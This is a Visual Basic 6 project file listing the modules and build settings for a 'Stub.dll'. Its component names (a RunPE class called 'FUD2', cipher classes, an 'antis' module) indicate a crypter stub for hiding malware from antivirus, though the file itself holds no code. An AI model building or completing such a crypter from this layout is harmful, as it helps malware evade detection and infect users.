Type=Exe
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\..\Windows\system32\stdole2.tlb#OLE Automation
Module=Stb; Stub\Módulos\Stb.bas
Class=Class2; Stub\RunPE\FUD2.cls
Class=clsDES; Stub\Cls\clsDES.cls
Class=clsGost; Stub\Cls\clsGost.cls
Class=clsRijndael; Stub\Cls\clsRijndael.cls
Class=clsTEA; Stub\Cls\clsTEA.cls
Class=clsRC4; Stub\Cls\RC4.cls
Class=clsXOR; Stub\Cls\XOR.cls
Module=Module2; Stub\Módulos\antis.bas
Startup="Sub Main"
HelpFile=""
Title="ASDFMASDFKASDF"
ExeName32="Stub.dll"
Path32="Compilado"
Command32=""
Name="Proyecto1"
HelpContextID="0"
CompatibleMode="0"
MajorVer=5
MinorVer=5
RevisionVer=5
AutoIncrementVer=0
ServerSupportFiles=0
VersionCompanyName="WRSoft.org"
CompilationType=-1
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1
